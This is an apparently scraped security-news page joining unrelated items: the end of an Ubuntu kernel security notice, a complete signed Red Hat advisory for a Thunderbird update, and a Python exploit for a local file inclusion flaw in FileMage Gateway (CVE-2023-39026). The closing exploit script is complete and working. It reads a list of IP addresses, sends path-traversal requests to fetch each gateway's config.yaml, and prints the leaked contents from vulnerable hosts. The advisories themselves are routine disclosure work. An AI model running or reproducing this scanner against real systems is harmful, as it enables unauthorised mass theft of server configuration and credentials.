ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6337-1  
   CVE-2020-36691, CVE-2022-0168, CVE-2022-1184, CVE-2022-27672,  
   CVE-2022-4269, CVE-2023-0590, CVE-2023-1611, CVE-2023-1855,  
   CVE-2023-1990, CVE-2023-2124, CVE-2023-2194, CVE-2023-28466,  
   CVE-2023-30772, CVE-2023-3111, CVE-2023-3141, CVE-2023-33203

Ubuntu Security Notice USN-6337-1

Red Hat Security Advisory 2023-4947-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.15.0.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2023:4947-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4947  
Issue date:        2023-09-04  
CVE Names:         CVE-2023-4051 CVE-2023-4053 CVE-2023-4573   
                   CVE-2023-4574 CVE-2023-4575 CVE-2023-4577   
                   CVE-2023-4578 CVE-2023-4580 CVE-2023-4581   
                   CVE-2023-4583 CVE-2023-4584 CVE-2023-4585   
=====================================================================

1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.15.0.

Security Fix(es):

* Mozilla: Memory corruption in IPC CanvasTranslator (CVE-2023-4573)

* Mozilla: Memory corruption in IPC ColorPickerShownCallback  
(CVE-2023-4574)

* Mozilla: Memory corruption in IPC FilePickerShownCallback (CVE-2023-4575)

* Mozilla: Memory corruption in JIT UpdateRegExpStatics (CVE-2023-4577)

* Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15,  
Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2  
(CVE-2023-4584)

* Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and  
Thunderbird 115.2 (CVE-2023-4585)

* Mozilla: Full screen notification obscured by file open dialog  
(CVE-2023-4051)

* Mozilla: Full screen notification obscured by external program  
(CVE-2023-4053)

* Mozilla: Error reporting methods in SpiderMonkey could have triggered an  
Out of Memory Exception (CVE-2023-4578)

* Mozilla: Push notifications saved to disk unencrypted (CVE-2023-4580)

* Mozilla: XLL file extensions were downloadable without warnings  
(CVE-2023-4581)

* Mozilla: Browsing Context potentially not cleared when closing Private  
Window (CVE-2023-4583)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2236071 - CVE-2023-4573 Mozilla: Memory corruption in IPC CanvasTranslator  
2236072 - CVE-2023-4574 Mozilla: Memory corruption in IPC ColorPickerShownCallback  
2236073 - CVE-2023-4575 Mozilla: Memory corruption in IPC FilePickerShownCallback  
2236075 - CVE-2023-4577 Mozilla: Memory corruption in JIT UpdateRegExpStatics  
2236076 - CVE-2023-4051 Mozilla: Full screen notification obscured by file open dialog  
2236077 - CVE-2023-4578 Mozilla: Error reporting methods in SpiderMonkey could have triggered an Out of Memory Exception  
2236078 - CVE-2023-4053 Mozilla: Full screen notification obscured by external program  
2236079 - CVE-2023-4580 Mozilla: Push notifications saved to disk unencrypted  
2236080 - CVE-2023-4581 Mozilla: XLL file extensions were downloadable without warnings  
2236082 - CVE-2023-4583 Mozilla: Browsing Context potentially not cleared when closing Private Window  
2236084 - CVE-2023-4584 Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15, Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2  
2236086 - CVE-2023-4585 Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and Thunderbird 115.2

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

Source:  
thunderbird-102.15.0-1.el9_0.src.rpm

aarch64:  
thunderbird-102.15.0-1.el9_0.aarch64.rpm  
thunderbird-debuginfo-102.15.0-1.el9_0.aarch64.rpm  
thunderbird-debugsource-102.15.0-1.el9_0.aarch64.rpm

ppc64le:  
thunderbird-102.15.0-1.el9_0.ppc64le.rpm  
thunderbird-debuginfo-102.15.0-1.el9_0.ppc64le.rpm  
thunderbird-debugsource-102.15.0-1.el9_0.ppc64le.rpm

s390x:  
thunderbird-102.15.0-1.el9_0.s390x.rpm  
thunderbird-debuginfo-102.15.0-1.el9_0.s390x.rpm  
thunderbird-debugsource-102.15.0-1.el9_0.s390x.rpm

x86_64:  
thunderbird-102.15.0-1.el9_0.x86_64.rpm  
thunderbird-debuginfo-102.15.0-1.el9_0.x86_64.rpm  
thunderbird-debugsource-102.15.0-1.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-4051  
https://access.redhat.com/security/cve/CVE-2023-4053  
https://access.redhat.com/security/cve/CVE-2023-4573  
https://access.redhat.com/security/cve/CVE-2023-4574  
https://access.redhat.com/security/cve/CVE-2023-4575  
https://access.redhat.com/security/cve/CVE-2023-4577  
https://access.redhat.com/security/cve/CVE-2023-4578  
https://access.redhat.com/security/cve/CVE-2023-4580  
https://access.redhat.com/security/cve/CVE-2023-4581  
https://access.redhat.com/security/cve/CVE-2023-4583  
https://access.redhat.com/security/cve/CVE-2023-4584  
https://access.redhat.com/security/cve/CVE-2023-4585  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk9itMAAoJENzjgjWX9erElaUQAJ6imjlYrp2SE9yph3dtT7zU  
FEtTZLTkZDmUT/OE+CBCH+4znore7zb7TMWUErJQRU36+388A9tfio8VHlA9wlXn  
MdjFCkm1vGrvPrlxYgZfEa7dnsepxE4m5ADHed3b5EG+6vKVvZaM+Etq1fDjJJpT  
au7ewdG/O4oD71+5c7zs309Ry8FQIMvmjOq5lxIMxpiebrA+4XFAXOpGJy7jqO2y  
A0InkdR3mg486FKohZp1M9apAVrM4ui2KSndwdfTIgz3ySVJ/++uqmGukIfE2EgN  
fn9z6WEw4xT3GOuhL2FIyK6Mbm6VWsd8S4E/i6RiajxoIh9GJ5mlSI1Pe4eHWlTk  
ar7q+r1NymxOzPlT8h294bzfAs48j173QzVHuyCt9BT8PNXOv/FetaUXNO8YLY1Q  
4v59BfsdlUjdAW4lu9vIuRzgJ6XOw/U0KFoR0sEG9WKTKw0JwaAaiDKIlVc11Zvx  
R7rf/5aNcpapN3AkCf66XWZQ0UGO5NjQfA7aJw9hUzzSFdgTvPOocb8xR8lQTMje  
y4aWDVlm/PpjvZYySJucyDu9YHDPaYr4V6BycSgtyR/G41IpvODr5pEbVhSDpYUf  
6NSGKsUtXpHpc3ulXL5h5XJ8r90LEspl3f7NaHUawhZczKY8PTo4w20Fo4d48erl  
c5OIr9FbHuMy26OXOWgT  
=M34e  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4947-01

FileMage Gateway version 1.10.9 suffers from a local file inclusion vulnerability.

    # Exploit Title: FileMage Gateway 1.10.9 - Local File Inclusion# Date: 8/22/2023# Exploit Author: Bryce "Raindayzz" Harty   # Vendor Homepage: https://www.filemage.io/# Version: Azure Versions < 1.10.9# Tested on: All Azure deployments < 1.10.9 # CVE : CVE-2023-39026# Technical Blog - https://raindayzz.com/technicalblog/2023/08/20/FileMage-Vulnerability.html# Patch from vendor - https://www.filemage.io/docs/updates.htmlimport requestsimport warningswarnings.filterwarnings("ignore")def worker(url):    response = requests.get(url, verify=False, timeout=.5)    return responsedef main():    listIP = []    file_path = input("Enter the path to the file containing the IP addresses: ")    with open(file_path, 'r') as file:        ip_list = file.read().splitlines()        searchString = "tls"        for ip in ip_list:            url = f"https://{ip}" + "/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cprogramdata%5cfilemage%5cgateway%5cconfig.yaml"            try:                response = worker(url)                #print(response.text)                if searchString in response.text:                    print("Vulnerable IP: " + ip)                    print(response.text)                    listIP.append(ip)            except requests.exceptions.RequestException as e:                  print(f"Error occurred for {ip}: {str(e)}")    for x in listIP:        print(x)if __name__ == '__main__':    main()

Source

Packet Storm